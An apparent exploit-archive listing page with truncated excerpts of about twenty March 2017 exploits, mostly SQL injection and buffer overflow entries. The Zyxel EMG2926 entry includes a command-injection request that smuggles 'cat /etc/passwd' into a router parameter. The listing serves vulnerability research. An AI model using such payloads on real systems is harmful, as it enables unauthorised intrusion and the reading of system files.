Zyxel EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection Vulnerability

Exploit for hardware platform in category remote exploits Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh...

DiskBoss Enterprise 7.8.16 - Import Command Local Buffer Overflow

DiskBoss Enterprise 7.8.16 - Import Command Local Buffer Overflow !/usr/bin/env python Exploit Title: DiskBoss Enterprise v7.8.16 - 'Import Command' Buffer Overflow Date: 2017-03-29 Exploit Author: Daniel Teixeira Author Homepage: www.danielteixeira.com Vendor Homepage: http://www.diskboss.com...

Microsoft Visual Studio 2015 update 3 - Denial of Service Exploit

Exploit for windows platform in category dos / poc Exploit Title: Microsoft Visual Studio 2015 update 3 – Stack overflow Date: 2017-03-26 Exploit Author: Peter Baris Vendor Homepage: http://www.saptech-erp.com.au Software Link:...

Disk Sorter Enterprise 9.5.12 - &#039;GET&#039; Remote Buffer Overflow (SEH)

!/usr/bin/env python Exploit Title: DiskSorter Enterprise 9.5.12 - 'GET' Remote buffer overflow SEH Date: 2017-03-22 Exploit Author: Daniel Teixeira Author Homepage: www.danielteixeira.com Vendor Homepage: http://www.disksorter.com Software Link:...

SpyCamLizard 1.230 - Denial of Service

SpyCamLizard 1.230 - Denial of Service import socket import sys author = ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: [email protected] Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay Date: 2017.03.22 Exploit Author: Greg Priest Version: SpyCamLizard...

Disk Sorter Enterprise 9.5.12 Buffer Overflow

!/usr/bin/env python Exploit Title: DiskSorter Enterprise 9.5.12 - 'GET' Remote buffer overflow SEH Date: 2017-03-22 Exploit Author: Daniel Teixeira Author Homepage: www.danielteixeira.com Vendor Homepage: http://www.disksorter.com Software Link:...

SpyCamLizard 1.230 - Denial of Service Exploit

Exploit for windows platform in category dos / poc import socket import sys author = ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: email protected Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay Date: 2017.03.22 Exploit Author: Greg Priest Version: SpyCamLizard v1.23...

iFdate Social Dating Script 2.0 SQL Injection

Exploit Title: iFdate Social Dating Script v2.0 - SQL Injection Google Dork: N/A Date: 18.03.2017 Vendor Homepage: http://turnkeycentral.com/ Software: http://turnkeycentral.com/scripts/social-dating-script/ Demo: http://demo.turnkeycentral.com/ifdate/index.php Version: 2.0 Tested on: Win7 x64,...

Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download

Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download import requests import string import random from urlparse import urlparse print "---------------------------------------------------------------------" print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File...

APNGDis 2.8 - chunk size descriptor Heap Buffer Overflow

APNGDis 2.8 - chunk size descriptor Heap Buffer Overflow Exploit Title: APNGDis chunk size descriptor Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8...

Car Workshop System SQL Injection

Exploit Title: Car Workshop System - SQL Injection Google Dork: N/A Date: 13.03.2017 Vendor Homepage: http://prosoft-apps.com/ Software: https://codecanyon.net/item/car-workshop-system/19562074 Demo: http://workshop.prosoft-apps.com/ Version: N/A Tested on: Win7 x64, Kali Linux x64 Exploit Author...

Kinsey Infor / Lawson / ESBUS - SQL Injection Vulnerability

Exploit for jsp platform in category web applications Exploit Title: Kinsey Infor / Lawson ESBUS - Multiple SQL Injections Date: 3/10/2017 Exploit Author: Michael Benich Vendor homepage: http://www.kinsey.com/infor-lawson.html Version: ALL Tested on: Windows Server 2008 R2; MySQL ver 5.5 CVE:...

Yacht Listing Script 2.0 - SQL Injection

Yacht Listing Script 2.0 - SQL Injection Exploit Title: Yacht Listing Script v2.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/yacht-listing-script/ Demo:...

Drupal 7.x Module Services - Remote Code Execution Exploit

Exploit for php platform in category web applications Exploit Title: Drupal 7.x Services Module Remote Code Execution Vendor Homepage: https://www.drupal.org/project/services Exploit Author: Charles FOL Contact: https://twitter.com/ambionics Website:...

Soundify 1.1 - &#039;tid&#039; SQL Injection

Exploit Title: Soundify - Audio Sharing Software v1.1 - SQL Injection Google Dork: N/A Date: 09.03.2017 Vendor Homepage: https://www.ncrypted.net/ Software: https://www.ncrypted.net/soundify Demo: http://demo.ncryptedprojects.com/soundify/ Version: N/A Tested on: Win7 x64, Kali Linux x64 Exploit...

Country On Sale SQL Injection

Exploit Title: Country on Sale Script - SQL Injection Google Dork: N/A Date: 09.03.2017 Vendor Homepage: http://www.websitescripts.org/ Software: http://www.websitescripts.org/website-scripts/country-on-sale-script/prod53.html Demo: http://www.websitescripts.org/demo/countryonsalescript/ Version:...

Country on Sale Script - SQL Injection

Exploit Title: Country on Sale Script - SQL Injection Google Dork: N/A Date: 09.03.2017 Vendor Homepage: http://www.websitescripts.org/ Software: http://www.websitescripts.org/website-scripts/country-on-sale-script/prod53.html Demo: http://www.websitescripts.org/demo/countryonsalescript/ Version:...

Evostream Media Server 1.7.1 (x64) - Denial of Service

Evostream Media Server 1.7.1 x64 - Denial of Service Exploit Title: Evostream Media Server 1.7.1 – Built-in Webserver DoS Date: 2017-03-07 Exploit Author: Peter Baris Vendor Homepage: http://www.saptech-erp.com.au Software Link: https://evostream.com/software-downloads/ Version: 1.7.1 Tested on:...

Azure Data Expert Ultimate 2.2.16 Buffer Overflow

Exploit Title: Azure Data Expert Ultimate 2.2.16 a buffer overflow Date: 2017-03-07 Exploit Author: Peter Baris Vendor Homepage: http://www.saptech-erp.com.au Software Link: http://www.azuredex.com/downloads.html Version: 2.2.16 Tested on: Windows Server 2008 R2 Standard x64 CVE : CVE-2017-6506 T...

Responsive Matrimonial Script 4.0.1 - SQL Injection

Responsive Matrimonial Script 4.0.1 - SQL Injection Exploit Title: Responsive Matrimonial Script v4.0.1 - SQL Injection Google Dork: N/A Date: 06.03.2017 Vendor Homepage: http://www.phpscriptsmall.com/ Software : http://www.phpscriptsmall.com/product/responsive-matrimonial/ Demo:...